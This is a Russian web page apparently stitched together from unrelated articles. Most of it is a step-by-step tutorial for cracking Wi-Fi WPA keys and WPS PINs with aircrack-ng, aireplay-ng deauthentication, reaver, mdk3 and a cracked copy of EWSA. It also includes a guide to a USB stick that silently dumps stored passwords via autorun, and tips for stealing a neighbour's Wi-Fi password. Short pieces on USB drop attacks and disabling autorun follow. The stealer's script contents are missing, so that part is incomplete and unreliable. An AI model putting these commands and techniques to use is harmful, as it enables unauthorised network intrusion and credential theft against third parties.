1) BackTrack 5 r3 — это система для тестирования на уязвимости сетей. Сейчас она больше не поддерживается производителем, но тем не менее всё работает! Вместо BackTrack появилась улучшенная версия Kali. Скачать Kali Linux 32 bit ISO (Примеры данной статьи сделаны в О.С. BackTrack, мало отличающийся от Kali).
2) Флешка — 8/16 Гб или пустой CD-DVD диск — 6 Гб.
3) Компьютер, используемый Вами для входа в интернет через wifi.
4) Другой компьютер, планшет или смартфон — в качестве жертвы.

Скачаем и установим BackTrack 5 r3 kde 32 bit на флешку.
Это удобнее, чем загрузка с DVD диска. Преимущество флешки в том, что все сделанные изменения сохраняются, а при перезагрузке файлы остаются на своих местах. К тому же не плохо всегда иметь под рукой загрузочную флешку. На тот случай если windows по каким то причинам перестанет загружаться. Например: синий экран, выход из строя жёсткого диска, вирус и т.д. Загрузочная USB флешка с сохранением изменений, открывает доступ к жёстким дискам, что даёт возможность спасти важные файлы. Плюс, знакомство с операционной системой LINUX.
Скачать BackTrack 5 R3 kde 32 bit и см. фото слева. Или скачать ЗДЕСЬ! Скачали? Теперь установим backtrack на флешку и сделаем её Persistent USB (флэш-диск постоянной памяти для хранения изменений), с помощью программы Universal-USB-Installer Скачать и см. фото 1 справа.
USB-Installer 1.9.4.9 ЗДЕСЬ!

Вставьте, заранее отформатированную (FAT-32) USB флешку в компьютер. Запустите программу — USB Universal Installer, дважды щелкнув мышкой (нет необходимости в установке).
1) Выберите Backtrack.
2) Нажмите кнопку Browse и выберите …./BT5R3-KDE-32.iso.
3) Теперь выберите флешку (USB Flash Drive). Будьте внимательны при выборе диска! Не перепутайте с жёстким диском компьютера и другими дисками!!!
4) Подвиньте бегунок (в зависимости размера Вашей флешки) для предоставления места, где бутут сохраняться данные внесённые Вами в процессе пользования системой BackTrack.
Если всё сделали правильно, флешка FAT32 (LBA) с сохранением изменений, готова к использованию.
Не вытаскивая флешку, перезагружаем компьютер. Заметьте! В настройках BIOS должна присутствовать возможность загрузки с USB носителя (это так, на всякий случай, в современных девайсах она давно есть). И сразу (до загрузки основной операционной системы) нажимаете клавишу соответствующею модели Вашего ноутбука. Для системного блока обычно используется клавиша DEL. Для ноутбуков — Esc, F12, F11, F10, F9 или F8. Загружаясь таким образом, мы попадаем в загрузочное меню и выбираем наше, USB устройство. В boot menu BackTrack выбираем persistence. После загрузки вводим команду startx — чтобы загрузить графическую систему.
Перед нами интерфейс операционной системы Linux BackTrack 5.
Прежде всего проверим работает ли наша флешка в режиме сохранения. Создайте на рабочем столе папку (правой кнопкой мыши, Create New -> Folder) и перезагрузитесь (выключите). Выход — значок в нижнем левом углу -> Leave-> End session-> Logout-> (вводим команду halt).
Если папка осталась, значит всё в порядке. Приступим к нашему эксперименту. Для начала включим интернет и обновим систему.
Откройте konsole см. фото 2 слева, для обновления команда apt-get update (Для Kali!). Если wicd не показывает сетевые точки, открываем настройки (Preferences) и меняем название сетевой карты.
Выключите интернет! — service wicd stop.
Далее, уточним название нашей wifi карты — команда
iwconfig, здесь wlan0 — название сетевой карты, у Вас оно может быть другим! Учтите это и используйте своё! Теперь переведём нашу сетевую карту в режим монитора (monitor mode), следуя логике (у меня wlan0!) пишем в консоли airmon-ng start wlan0. В самом низу видим сообщение об успешном переводе сетевой карты wlan0 в режим монитора, а название — mon0 (monitor mode enabled on mon0). Учтите! У Вас оно может быть другим! Используйте своё название! Далее все команды будут использовать виртуальный адаптер (у меня mon0!).
Продолжим. Введите команду airodump-ng mon0. Ага, вот мы видим, сколько вай фай точек находится в радиусе действия нашего адаптера, так же собственный роутер — А…. Так же доп. параметры всех точек (канал, метод шифрования и т. д.) см. фото 3 справа. Сейчас включаем другой компьютер, планшет или смартфон, входим в интернет через свой роутер, заходим на любой сайт (в общем начинаем активно использовать интернет) для потребления трафика. Это нужно чтобы появился STATION и это означает, что к исследуемой нами точке подключён какой-то компьютер. И это условие необходимо для успешной атаки.
Идём дальше. Нажимаем комбинацию клавиш Ctrl+c, открываем другое окно (Konsole) и пишем (копируем) команду airodump-ng -w file -c 1 —bssid 00:24:xx:xx:xx:77 mon0, где:
-w — любое название .cap файла.
-c — канал (у Вас может быть другой).
—bssid — BSSID атакуемой точки (у Вас он будет другой).
Нажав Enter, в папке root появятся несколько файлов, нам нужен только один файл — с расширением .cap. Так вот, он ещё относительно пустой. Надо чтобы на другом компьютере, произошло отключение и подключение к интернет. Это можно сделать удалённо.
Открываем другое окно терминала и пишем aireplay-ng -0 1 -a 00:24:xx:xx:xx:77 -c 00:xx:xx:xx:xx:08 mon0, где:
-a — BSSID.
-c — STATION.
Этой командой, мы удалённо обрываем аутентификацию на другом компьютере. См. фото 4 слева. Тем самым заставляя соединиться с сетью заново (вручную или происходит автоматически, если в свойствах стоит галочка).
Наша цель — получить так называемый handshake. Об этом нас проинформирует airodump, отобразив в верхней строке справа сообщение «WPA handshake: 00:24:xx:xx:xx:77». Если handshake нет, снова используем aireplay-ng или команда mdk3 mon0 d -c 1 -s 1 (-c это номер канала!). Остановить — Ctrl+c.
В конце концов, получив сообщение о успешном рукопожатие (WPA handshake: 00:24:xx:xx:xx:77) переходим в папку Home и копируем файл с расширением .cap на жёсткий диск или в корень USB флешки.
Выключаем Backtrack 5 r3 и загружаем windows. Но сначала проверим .cap файл, так как он может быть не рабочим.
В терминале пишем pyrit -r file-01.cap analyze. Чем больше строк со словом good тем лучше. Если «good»ов нет или только ОДИН, удаляем файл и повторяем процедуру добычи handshake заново. см. фото 5 справа. И так, у нас есть рабочий .cap, проверим его в деле с помощью Aircrack, команда aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst *.cap. Мы видим как Aircrack подбирает пароль к исследуемой точке и это может занять много времени. Всё зависит от сложности пароля и качества словаря. Остановите программу — Ctrl+c.
Второй этап эксперимента — нахождение пароля из словаря, это можно сделать в linux и в windows. Учитывая, что брут (подбор пароля) процедура долгая, покажу, как это делать через привычный интерфейс windows. Но с начало очистим и уменьшим .cap файл с помощью wireshark. См. фото 6 слева.
В терминале пишем wireshark. В программе по центру, щёлкаем Open, находим и открываем файл .cap. В поле Filter вставляем предложение: wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol и нажимаем Apply. Теперь сохраним. Нажимаем верхнюю левую кнопку File, вкладка Export Specified Packets или (Save As..-> в поле Name: пишем любое название файла .cap) — как на фото 6 слева и нажимаем Save с сохранением на жёсткий диск или в корень флешки.
Вот теперь выключаем linux и загружаем windows.
Для брута нам потребуется программа с поддержкой видеокарт NVIDIA либо ATI — EWSA (Elcomsoft Wireless Security Auditor) Скачать торрент файл.
А так же хороший словарь. Скачать словари — торрент файл.
Скачать программу Торрент с офф. сайта.
Скачиваем всё это и устанавливаем программу. Для полноценной работы программы EWSA, после установки заменяем файл ewsa.exe на такой же, но из папки Crack. Запускаем программу.
Заходим в «Настройки», проверяем «CPU» и «GPU», в «Установки словаря атаки» добавляем словари. См. фото 7 справа. Далее — «Импорт данных», «Импортировать файл TCPDUMP» — выбираем наш .cap файл и жмём «Запустить атаку». И если в словаре есть Ваш пароль, то программа Elcomsoft Wireless Security Auditor сообщит Вам об этом.
Так же в помощь для нахождения пароля из handshake, онлайн ресурсы:
http://wpa-sec.stanev.org/ — сначала получите ключ !
https://xsrc.ru/
http://wpa.darkircop.org/
https://decrypthash.ru/recovery-password-for-wifi/ http://airslax.com/wpa2/
https://www.gpuhash.me/?menu=ru-tasks-add
https://router-db.com/
Вот ещё словари для Wi-Fi. Скачать WiFi словари -торрент файл.
И ещё словари:https://forum.antichat.ru/threads/281655/

Есть ещё другой способ взлома WiFi, более простой. Через BackTrack 5 R3 с помощью широко известной утилиты reaver. Подходит для любого типа шифрования, главное, что бы на роутере был включён WPS.
Продолжим аудит безопасности беспроводных сетей Wi-Fi!
Penetration test !
У Вас уже есть флешка с линуксом на борту. Загружаем BackTrack, меняем свой MAC адрес и смотрим название сетевой карты!
Справочник MAC адресов и ЕЩЁ.
Все команды в терминале идут в таком порядке:
1) iwconfig — wlan0 у Вас может другое!
2) ifconfig wlan0 down
3) macchanger -m 00:11:22:33:44:55 wlan0 — меняем MAC адрес
4) airmon-ng start wlan0 — см. название виртуального адаптера
5) ifconfig mon0 down
6) macchanger -m 00:11:22:33:44:55 mon0
7) ifconfig wlan0 up
8) ifconfig mon0 up
Проверяем — есть ли в радиусе действия карты, точки с включенным wps. Команда wash -i mon0 —ignore-fcs. Ага, есть такие. А так же присутствует наша экспериментальная точка, которую будем проверять. См. фото 8 слева !
Жмём комбинацию клавиш Ctrl+c. В другом окне (Konsole) запускаем reaver через виртуальный адаптер (у меня mon0), команда reaver -i mon0 -A -b 00:18:E7:XX:XX:XX -m 00:11:22:33:44:55 —dh-small —no-nacks —win7 -vv. Где:
-b — bssid Вашей тестируемой точки
-m — новый мак адрес (в backtrack_те)
Жмём Enter. Ещё открываем окно для aireplay и пишем aireplay-ng mon0 -1 120 -a 00:18:E7:XX:XX:XX -e ..essid.. Ваш ESSID !
Зачем нужен aireplay ?
Бывает во время перебора, процент долго не увеличивается или зациклился «EAPOL START».
Ждем, пока программа подберет пин код к роутеру. Время подбора зависит от разных факторов, от нескольких минут, если pin 01234567, до нескольких суток! Если pin 9999…., плюс другие побочные факторы в виде тайм аута. Когда reaver подберёт пин код, внизу Вы увидите три надписи: имя сети, пин код и пароль от wifi. Обязательно запишите пин код роутера. Его можно использовать даже при смене пароля! Вам будет достаточно запустить программу с ключом: -p и reaver мгновенно покажет новый пароль.
Так же попробуйте уже известные и часто используемые пины для bssid начинающиеся тремя парами (байтами) из списка. См. фото 9 справа. Вот команда reaver -i mon0 -b 00:18:E7:XX:XX:XX -p 28113065 -vv . Где:
-b — BSSID (вместо крестиков — полностью значение!)
-p — известный пин из списка.
Скачать список пин кодов для WPS.
Ещё одна распространённая проблема, когда роутер выдаёт подряд 60 секундную блокировку: WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking.
Остановите reaver и допишите ключ -r 3:60 или -d 60. Убирите ключ -A. Для продолжения нажмите клавишу — ↑, появится последняя команда, отредактируйте и нажмите Enter. Reaver спросит: продолжить сохранённую сесию или нет. Y — продолжить, n — начать всё с начало. Так же, на появление ошибок большую роль играет плохой уровень сигнала (RSSI) -40 хорошо, -100 плохо.
Другой способ решения проблемы, когда reaver очень долго гоняет по кругу один и тот же пин или «EAPOL START» — остановите сессию, посмотрите последний pin. Предположим — 65434577. Попробуем перескочить через злополучное место, увеличив значение с большим запасом. Путь, где лежат файлы с сохранёнными данными — (root/usr/local/etc/reaver ). В ней два файла, открываем и редактируем файл с названием MAC (bssid) адреса точки, расширение .wpc. То есть стираем в первой строчке 4 цифры и увеличиваем значение 6543 на 7000 или 6600. Во второй и третьей строчке пишем по нулю. Сохраняем файл.
Далее открываем файл reaver.db, но сначала подключим интернет и скачаем программу sqlitebrowser, команда в терминале apt-get install sqlitebrowser. Скачали? Тогда запускаем. Пишем — sqlitebrowser. С помощью этой программы мы и будем открывать файл reaver.db. File -> Open Database -> путь к файлу -> reaver.db. Нажимаем вкладку Browse Data, находим и меняем проблемный пин.см. фото 10 слева. Сохраняем файл, выключаем интернет и запускаем reaver, на вопрос отвечаем yes.
Бывает, что reaver задумается и ждёт у моря погоды, попробуйте его подтолкнуть командой wash -i mon0.
И если роутер совсем не хочет общаться с reaver_ом, перебор ни как не начинается, выдаёт много ошибок, зацикливается и т. д. и т. п. Стоит применить грубую силу (необходимо присутствие клиента — STATION).
mdk3 mon0 d -t 00:18:E7:XX:XX:XX -e .essid.., через 3 минуты останавливаем.
mdk3 mon0 a -a 00:18:E7:XX:XX:XX, останавливаем через 5 минут.
Проверяем.

Что бы посмотреть все параметры reaver_a, в другом окне напишите reaver -h.
Классическая атака — reaver -i mon0 -b 00:18:E7:XX:XX:XX —dh-smal -vv.
Вообще, в процессе перебора могут возникнуть всевозможные проблемы и точного рецепта не существует. Всё зависит от Вас! И если Вы твёрдо решили достичь своей цели, то всё обязательно получится! Это лишь вопрос времени.
Для решения других проблем связанных с reaver пользуйтесь google или https://code.google.com. Для поиска пин кода, в поисковой строке google укажите без скобок экспериментальный BSSID
так — (00:18:E7 wps) или так — («00:18:E7» wps).
На последок хочу обратить Ваше внимание на другой метод похищения wi-fi пароля.
Социальная инженерия.
Под каким либо предлогом, усевшись за Ваш компьютер пока Вы завариваете чай на кухне. Находчивый сосед с флешки может запустить безобидную программу «WiFi Password Decryptor», которая моментально находит и сохраняет (Export…) все пароли от вай фай точек. Скачать бесплатную программу — WiFi Password Decryptor. Кроме Win XP и более ранних версий!
Другой сосед может случайно вырубить в квартире свет, тем самым сбросив настройки роутера (этот способ как вариант иногда срабатывает) и долго извиняться, что перепутал автомат:).
Какой вывод можно сделать из всего этого?
· Ставьте сложные пароли — не менее 12 символов включающие знаки,
цифры и буквы с учётом регистра.
· Поменяйте пароль при входе в админку роутера.
· В настройках роутера уберите галочку WAN порт.
· Выключите WPS !
· Для того что бы узнать, кто подключён к Вашей WiFi точке, скачайте и запустите программу Wireless Network Watcher. Скачать программу WNWatcher.

Пожалуй, всё.

Услуги частного мастера:

Написать письмо Обратная связь
Ваше предложение.

Как хакеры используют USB-накопители

Мелиа Робинсон / Tech Insider Лучший друг хакера — это маленький USB-накопитель, который вы подключаете к компьютеру.

Маленькие флэш-накопители часто используются для простого обмена файлами с компьютера на компьютер. Но, как Tech Insider убедился воочию, следя за хакерами из RedTeam Security во время теста на проникновение в энергетической компании, диски являются одними из самых простых способов установить вредоносное программное обеспечение и получить доступ к компьютеру.

Есть два способа сделать это.

RedTeam продемонстрировала нам оба метода, которые начинаются с того, что бросают палки в места с интенсивным движением вокруг своей цели.В некоторых случаях они бросают устройства на стоянку в надежде, что их подберет любопытный человек.

Хакеры могут использовать обычные стандартные USB-накопители или устройства, которые выглядят как «резиновые уточки». Но в любом случае результат — если вы возьмете его и подключите к компьютеру — будет таким же.

Все, что нужно сделать, это взять флешку внутри, воткнуть ее в розетку и щелкнуть файл, который RedTeam назвал salaries2016.doc, что, вероятно, вызовет интерес у сотрудника.После открытия файл предложит пользователю «включить макросы». После этого документ сможет запускать вредоносное ПО, которое может делать все, от активации веб-камеры до ведения журнала нажатий клавиш.

Этот трюк с USB в основном то же самое, что и электронная почта. фишинг атаковать, и это удивительно эффективно.Недавнее исследование Университета Иллинойса показало, что почти 50% людей берут случайный USB-накопитель и проходят все шаги, необходимые для взлома своего компьютера.

Затем есть резиновая уточка, которая не требует от пользователя ничего, кроме подключения ее к розетке.

Устройство за 40 долларов выглядит как USB-накопитель, но на самом деле это мини-компьютер, который заставляет машину думать, что это клавиатура. Подобно тому, как компьютер распознает новую клавиатуру после подключения и автоматически устанавливает свое программное обеспечение, эта штука «крякает, как клавиатура, и печатает как клавиатура», таким образом обманывая компьютер, заставляя его выполнять любые команды, данные хакером.

Универсальный магазин Hackaday

«Над этими атаками легко смеяться, но страшно то, что они работают — и с этим нужно бороться», — сказал Материнской плате исследователь Мэтт Тишер.

Также стоит отметить, что антивирусное программное обеспечение неэффективно для предотвращения подобных атак.

К счастью, демонстрация RedTeam была лишь проверкой безопасности компании. Но угроза, которую представляют USB-накопители на рабочем месте — и даже в армии США — вполне реальна.

И на самом деле нет простого решения. Как написал эксперт по кибербезопасности Брюс Шнайер: «Проблема не в том, что люди идиоты…. Проблема в том, что подключать USB-накопитель к компьютеру небезопасно ».

« Лучший совет — не доверять ничему, если вы не знаете, откуда оно взялось », — сказал Курт Мюль. консультант по безопасности RedTeam Security. «Если вы обнаружите USB-накопитель, лежащий на земле на работе, сообщите об этом потерянным и найденным или отправьте электронное письмо коллегам, что вы его нашли».

Социальная инженерия с использованием USB-накопителя — Информация Служба безопасности — Вычислительные услуги

Когда пользователи получают фишинговые сообщения электронной почты с помощью определенных методов, это часто называют социальной инженерией.Например, вы получите электронное письмо с объяснением, что ваша учетная запись Yahoo будет отключена. Чтобы этого не произошло, вам будет предложено предоставить личную информацию, такую ​​как ваш идентификатор пользователя, пароль и полное имя. Если вы ответите на это фишинговое письмо с запрошенной информацией, вы предоставите хакеру доступ к своей электронной почте и к личной информации (PII), расположенной в вашей учетной записи.

Социальная инженерия, таким образом, описывается как вторжение нетехнического характера, которое основывается на взаимодействии людей и часто включает в себя обман других людей с целью нарушения обычных процедур безопасности.

В социальной инженерии используются различные тактики, некоторые из которых:

Социальная инженерия по телефону . Хакер пытается притвориться авторитетным лицом, чтобы убедить пользователя предоставить конфиденциальную информацию. Они могут использовать авторитетные посты, например, выдавать себя за представителя телефонной компании или представителя банка.

Дайвинг в мусорных контейнерах . Это также известно как мусор, когда хакер ищет конфиденциальную информацию (например,g., банковские выписки, предварительно утвержденные кредитные карты и студенческие ссуды) в мусор.

Социальная инженерия в Интернете . Хакеры часто пытаются обманом заставить пользователей предоставить конфиденциальную информацию через электронную почту, обмен мгновенными сообщениями, чаты или сайты социальных сетей и т.д. Они просят пользователя подтвердить свое имя пользователя, пароль и идентификатор пользователя, ответив на электронное письмо или щелкнув ссылку, которая направляет пользователя на законно выглядящий, но поддельный веб-сайт.

Обратная социальная инженерия . Это когда хакер выдает себя за технического помощника, чтобы исправить компьютерную проблему, которую он действительно создал или которой не существует. Пользователь связывается с этим помощником, и затем ему предлагается предоставить ему конфиденциальную информацию, чтобы решить проблему. Пользователь предоставляет необходимую информацию, и проблема, похоже, решена.

USB-накопители

Хакеры также могут использовать USB-накопители для доступа к конфиденциальной информации, хранящейся на компьютере или в сети.Хакеры могут заразить один или несколько USB-накопителей вирусом или трояном, который при запуске предоставит хакерам доступ к логинам, паролям и информации на компьютере пользователя или в сети, к которой он подключен. Затем хакер может оставить зараженный USB-накопитель без присмотра на полу, в кластере или рядом с ним, в коридорах, туалетах или любых местах с относительно большим объемом трафика. Пользователь, который находит USB-накопитель, часто устанавливает его на свой компьютер или кластерный компьютер для поиска идентифицируемой информации, которая может быть использована для определения местонахождения владельца USB-устройства.

Этот документ посвящен социальной инженерии с использованием USB-накопителя. Если вы подозреваете, что ваш компьютер или любой другой компьютер, который вы использовали для подключения USB-накопителя, был взломан, выполните следующие действия:

  1. Отключить компьютер от сети
  2. Отключить беспроводное соединение
  3. Свяжитесь с отделом информационной безопасности (ISO) по адресу [email protected], администратором вашего отдела, консультантом по DSP или справочным центром вычислительных служб по адресу X8-HELP (4357) или it-help @ cmu.edu

Меры защиты
  • Установите и обновите антивирусное программное обеспечение (например, Защитник Windows). Посетите «Защитите свой компьютер» на веб-сайте Computing Services, чтобы получить инструкции по загрузке, использованию и обновлению антивирусного программного обеспечения.
  • Установите и обслуживайте брандмауэр. Для получения инструкций по настройке брандмауэра Windows или Macintosh посетите веб-сайт Computing Services Security Your Computer.
  • Избегайте подключения неизвестного USB-устройства к компьютеру или кластерному компьютеру.Если USB-накопитель обнаружен без присмотра, передайте его консультанту по кластеру, в Справочный центр компьютерных служб, помощнику по месту жительства (RA) или в полицию кампуса Карнеги-Меллона.
  • Отключите автозапуск на вашем компьютере. Автозапуск — это функция, которая позволяет Windows автоматически запускать программу запуска, когда в привод вставлен компакт-диск, DVD-диск или USB-устройство. Автозапуск также автоматически показывает содержимое USB-устройства, такого как iPod или флэш-накопитель, когда оно вставлено в компьютер.Чтобы отключить функцию автозапуска на вашем компьютере, выполните следующие действия: (эти действия рекомендованы в примечании об уязвимости CERT 889747).

Чтобы эффективно отключить автозапуск в Microsoft Windows, импортируйте следующий параметр реестра:

РЕГЕДИТ4

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ IniFileMapping \ Autorun.inf]

@ = «@ SYS: DoesNotExist»

Чтобы импортировать это значение, выполните следующие действия:

  • Скопировать текст
  • Вставьте текст в Блокнот Windows
  • Сохраните файл как автозапуск.рег
  • Перейдите в папку с файлом
  • Дважды щелкните файл, чтобы импортировать его в реестр Windows

Обратите внимание, что на всех компьютерах, управляемых DSP (Desktop Support Program), отключена функция автозапуска, чтобы предотвратить автоматическое выполнение программы Windows, когда в компьютер вставлено устройство CD / DVD или USB. При вставке CD / DVD или любого USB-устройства Windows больше не будет открывать эти устройства автоматически. Чтобы просмотреть содержимое любого вставленного носителя, откройте «Мой компьютер» на рабочем столе или в меню «Пуск» и дважды щелкните нужный диск, чтобы просмотреть его содержимое.

Взломайте все пароли на любом ПК с USB | by tech duck

Взлом не всегда используется с целью получения личной информации.

Но это также необходимо для предотвращения взлома. Как вы, возможно, знаете, операционная система Windows легко поддается взлому из-за ее файловой структуры. Поскольку это более удобно, более одного миллиарда пользователей используют только Windows 10.

Windows и поддерживающие ее браузеры повторно сохраняют учетные данные, такие как пароли, в основном в текстовом формате.Это все равно, что оставить ключ в замке.

Пользователи, которые все время остаются в сети и не могут быстро выйти из своей учетной записи. Учетные записи, такие как Facebook, Outlook, интернет-банкинг и т. Д.

Мы можем получить текст пароля с этих машин с помощью некоторых базовых программ.

Но здесь мы собираемся создать универсальные инструменты программирования на USB-накопителе. Благодаря этому мы можем собирать пароли с хоста с помощью подключаемого модуля USB.

Примечание: только для образовательных целей.

Нам нужно загрузить некоторые приложения, перечисленные ниже. Не скучайте, увидев список. Идеальному стилеру USB нужно больше приложений.

1. mspass.exe

Mspass можно использовать только для восстановления паролей для пользователей, которые вошли в систему на локальном компьютере, где хранится пароль, поэтому, если вы обычно входите в систему как администратор по умолчанию, вы собираетесь необходимо войти в систему как администратор, чтобы получить доступ к утерянному паролю (т. е.) Windows Live Messenger.

Это инструмент восстановления, совместимый с Windows XP, Windows Vista и Windows 7, который показывает пароли следующих приложений обмена мгновенными сообщениями:

MSN Messenger

Windows Messenger (в Windows XP)

Windows Live Messenger ( В Windows XP / Vista / 7)

Yahoo Messenger (версии 5.x и 6.x)

ICQ Lite 4.x / 5.x / 2003

AOL Instant Messenger версии 4.6 или ниже, AIM 6.x и AIM Pro.

Trillian

Trillian Astra

Miranda

GAIM / Pidgin

MySpace IM

PaltalkSc

Скачайте пароль MS здесь: https://www.nirsoft.net/toolsdownload/mspass.z exe

Mail PassView — это небольшой инструмент для восстановления пароля электронной почты для ПК с Windows, который показывает пароли и другие данные учетной записи для следующих почтовых клиентов:

Outlook Express

Microsoft Outlook 2000 (только для учетных записей POP3 и SMTP)

Microsoft Outlook 2002/2003/2007/2010/2013/2016 (учетные записи POP3, IMAP, HTTP и SMTP)

Windows Mail

Windows Live Mail

IncrediMail

Eudora

Netscape 6.x / 7.x (если пароль не зашифрован мастер-паролем)

Mozilla Thunderbird (Если пароль не зашифрован мастер-паролем)

Групповая почта бесплатно

Yahoo! Почта — Если пароль сохранен в Yahoo! Приложение для обмена сообщениями.

Hotmail / MSN mail — если пароль сохранен в приложении MSN / Windows / Live Messenger.

Gmail — если пароль сохранен приложением Gmail Notifier, Google Desktop или Google Talk.

Для каждой учетной записи электронной почты отображаются следующие поля: Имя учетной записи, Приложение, Электронная почта, Сервер, Тип сервера (POP3 / IMAP / SMTP), Имя пользователя и Пароль.Эта утилита представляет собой автономный исполняемый файл. Не требует установки или дополнительных библиотек DLL. Просто запустите исполняемый файл (mailpv.exe) и просмотрите список своих учетных записей электронной почты. Вы можете сохранить информацию об учетной записи в текстовый файл или скопировать их в буфер обмена.

Загрузите mailpv здесь: https://www.nirsoft.net/toolsdownload/mailpv.zip

3. iepv.exe

IE PassView — это небольшая служебная программа для управления паролями, которая обнаруживает пароли, хранящиеся в веб-браузере Internet Explorer.Вы можете выбрать один или несколько элементов из списка паролей и экспортировать их в файл text / html / csv / xml. IE PassView позволяет удалять пароли, которые вам больше не нужны. Он поддерживает все версии Internet Explorer, от версии 4.0 до 9.0.

Для каждого пароля, который хранится в Internet Explorer, отображается следующая информация: веб-адрес, тип пароля, место хранения и пара имя пользователя / пароль.

E PassView также позволяет извлекать пароли Internet Explorer и Microsoft Edge с внешнего жесткого диска.

Загрузите здесь: https://www.nirsoft.net/toolsdownload/iepv.zip

4. pspv.exe

Protected Storage PassView — это небольшая утилита, которая обнаруживает пароли, хранящиеся на вашем компьютере с помощью Internet Explorer, Outlook Express и MSN Explorer. Пароли раскрываются путем чтения информации из защищенного хранилища.

Начиная с версии 1.60, эта утилита показывает все строки автозаполнения, хранящиеся в Internet Explorer, а не только пароль автозаполнения, как в предыдущих версиях.

Загрузите здесь: https://www.nirsoft.net/toolsdownload/pspv.zip

5. Passwordfox.exe

PasswordFox — это небольшой инструмент для восстановления пароля, который позволяет просматривать имена пользователей и пароли, хранящиеся в Mozilla Firefox. Веб-браузер. По умолчанию PasswordFox отображает пароли, хранящиеся в вашем текущем профиле, но вы можете легко выбрать просмотр паролей любого другого профиля Firefox. Для каждой записи пароля отображается следующая информация: индекс записи, веб-сайт, имя пользователя, пароль, поле имени пользователя, поле пароля и имя файла входа.

Примечание: вы также можете искать operpass, chrompass

Скачать здесь: https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip

6. Dialuppass.exe

Dialupass перечисляет все коммутируемые / Записи VPN на ваших компьютерах и отображают их данные для входа, включая имя пользователя, пароль и домен. Вы можете использовать Dialupass, чтобы восстановить утерянный пароль вашего интернет-соединения или VPN.

Dialupass также позволяет сохранять список коммутируемого доступа / VPN в текстовый / HTML / CSV / XML файл или копировать его в буфер обмена.

Загрузите здесь: https://www.nirsoft.net/toolsdownload/dialupass.zip

7. Netpass.exe

Приложение можно использовать для чтения паролей из текущей операционной системы или с внешнего диска, на который вы установили Windows. Внешний диск также может быть от другого компьютера с Windows. Он может восстановить следующие пароли.

Пароли входа удаленных компьютеров в вашей локальной сети.

Пароли учетных записей электронной почты на сервере Exchange (хранятся в Microsoft Outlook)

Пароль учетных записей MSN Messenger / Windows Messenger

Internet Explorer 7.x и 8.x: пароли веб-сайтов, защищенных паролем («Обычная проверка подлинности» или «Проверка подлинности дайджест-доступа»).

Имя элемента паролей IE7 всегда начинается с префикса «Microsoft_WinInet».

Пароли, хранящиеся в Remote Desktop 6.

Загрузите здесь: https://www.nirsoft.net/toolsdownload/netpass-x64.zip

8. Wirelesskeyview.exe

Эта бесплатная программа позволяет пользователям просматривать пароли, хранящиеся в Менеджер WiFi. Его главное окно, похожее на электронную таблицу, отображает все WEP / WPA, хранящиеся на компьютере.

Он также может просматривать ключи ASCII, ключи HEX и GUID адаптера. С WirelessKeyview пользователи могут в любое время в полной мере использовать точки Wi-Fi.

Загрузите здесь: https://www.nirsoft.net/toolsdownload/wirelesskeyview-x64.zip

9. Bulletspassview.exe

BulletsPassView — это инструмент для восстановления пароля, который показывает пароли, хранящиеся за маркерами, в стандартном тексте пароля. -бокс операционной системы Windows и веб-браузера Internet Explorer. После раскрытия паролей вы можете легко скопировать их в буфер обмена или сохранить в файл text / html / csv / xml.BulletsPassView не показывает пароль внутри самого текстового поля пароля. Пароль отображается только в главном окне BulletsPassView, в то время как в текстовом поле пароля по-прежнему отображаются маркеры.

BulletsPassView также поддерживает Windows 7 / Vista / 2008, в то время как Asterisk Logger не работает в этих новых операционных системах.

BulletsPassView также показывает пароли, хранящиеся в текстовом поле пароля Internet Explorer.

BulletsPassView поддерживает параметры командной строки для сохранения текущих открытых полей пароля в файл text / html / csv / xml.

BulletsPassView — это юникод-приложение, которое обеспечивает правильное извлечение паролей с неанглийскими символами.

Загрузите здесь: https://www.nirsoft.net/utils/bulletspassview-x64.zip

10. VNCPassView.exe

VNCPassView — бесплатное приложение, которое может восстанавливать пароли, хранящиеся в VNC (виртуальные сетевые вычисления) орудие труда.

VNCPassView может восстановить оба пароля сразу после запуска. это:

1: пароль, сохраненный для текущего пользователя, вошедшего в систему (HKEY_CURRENT_USER в реестре)

2: пароль, сохраненный для всех пользователей.

загрузите здесь: https://www.nirsoft.net/toolsdownload/vncpassview.zip

шаг 1:

Доступно множество других стейлинговых приложений. Теперь нам нужно извлечь файлы, которые вы скачали на рабочий стол, и скопировать все файлы .exe на USB.

step2: Откройте блокнот / wordpad и введите:

сохраните это как AUTORUN.inf ​​

шаг 3: откройте новый документ блокнота / wordpad и введите:

сохраните его как LAUNCH.bat

скопируйте автозапуск и запустите файл на USB

step4:

удалите и снова вставьте USB

нажмите на опцию выполнить сканирование на вирусы

(это пример, если вы хотите, чтобы он сказал что-то еще, перейдите в файл автозапуска и измените его;))

перейдите к моему компьютеру — -> USB-накопитель и откройте его

, вы увидите несколько текстовых файлов, если вы откроете их, вы увидите имена пользователей и пароли

ВНИМАНИЕ: Это восстанавливает только те пароли, которые когда-то были сохранены на вашем компьютере.

Спасибо, ребята, увидимся снова.

USB Drop Attacks: опасность «потерянных и найденных» флэш-накопителей

В настоящее время флэш-накопители используются практически повсюду. Будь то обычная металлическая карта памяти, фирменная раздача на мероприятии или умно замаскированная под Йоду или какой-либо другой символ поп-культуры, эти устройства повсеместно используются как простой способ передачи данных.

К сожалению, их также любят киберпреступники, которые могут использовать флэш-накопители для атак на ваш компьютер.

При атаке через универсальную последовательную шину (USB) киберпреступники оставляют USB-устройства, чтобы люди могли их найти и подключить к своим компьютерам. Добрый самаритянин, надеющийся вернуть диск, или пинчер, надеющийся бесплатно положить в карман новое устройство, вставляет «найденный» диск в USB-порт своего компьютера. Потом начинается беда.

Существует три основных типа атак:

  • Вредоносный код — В большинстве атак сбрасывания USB пользователь нажимает на один из файлов на диске.Это запускает вредоносный код, который автоматически активируется при просмотре и может загружать другие вредоносные программы из Интернета.
  • Социальная инженерия — Файл переносит пользователя флэш-накопителя на фишинговый сайт, который обманом заставляет их передать свои учетные данные.
  • Спуфинг HID (Human Interface Device) — При более сложной атаке устройство выглядит как USB-накопитель, но на самом деле заставляет компьютер думать, что к нему подключена клавиатура. При подключении к компьютеру он вводит нажатия клавиш, чтобы дать компьютеру команду предоставить хакеру удаленный доступ к компьютеру жертвы.(Мы обучаем студентов аналогичному методу в нашем обучении Red Team!)

